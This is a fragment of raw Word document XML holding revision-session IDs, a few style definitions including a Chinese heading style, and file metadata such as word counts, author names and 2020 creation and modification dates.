    <w:rsid w:val="00EF2DBD"/>
    <w:rsid w:val="00F115F3"/>
    <w:rsid w:val="00F16330"/>
    <w:rsid w:val="00F32281"/>
    <w:rsid w:val="00F800D4"/>
    <w:rsid w:val="00F8795E"/>
    <w:rsid w:val="00F904CE"/>
    <w:rsid w:val="2FDFC69B"/>
    <w:rsid w:val="3DF9C766"/>
    <w:rsid w:val="4FBFFBA2"/>
    <w:rsid w:val="5F2F123B"/>
    <w:rsid w:val="6CBBBAC1"/>
    <w:rsid w:val="6F5D5B58"/>
    <w:rsid w:val="6FFFB588"/>
    <w:rsid w:val="71B3770E"/>
    <w:rsid w:val="77FE00DC"/>
    <w:rsid w:val="7B5FAD63"/>
    <w:rsid w:val="7BFF2FAA"/>
    <w:rsid w:val="7FC76FED"/>
    <w:rsid w:val="7FCFC111"/>
    <w:rsid w:val="B7E99C74"/>
    <w:rsid w:val="BDFFF807"/>
    <w:rsid w:val="C9BB8C7E"/>
    <w:rsid w:val="DADD1C7F"/>
    <w:rsid w:val="E1FFEE87"/>
    <w:rsid w:val="EEEFD6BF"/>
    <w:rsid w:val="FCF74E4D"/>
    <w:rsid w:val="FCFE8940"/>
    <w:rsid w:val="FFD2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6"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:r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8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3 字符"/>
    <w:basedOn w:val="8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16">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="8"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标题 4 字符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867</Words>
  <Characters>4946</Characters>
  <Lines>41</Lines>
  <Paragraphs>11</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>5802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2020-10-02T11:06:00Z</dcterms:created>
  <dc:creator>不见君 FengHLZ</dc:creator>
  <cp:lastModifiedBy>shirohaethu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-07T17:06:20Z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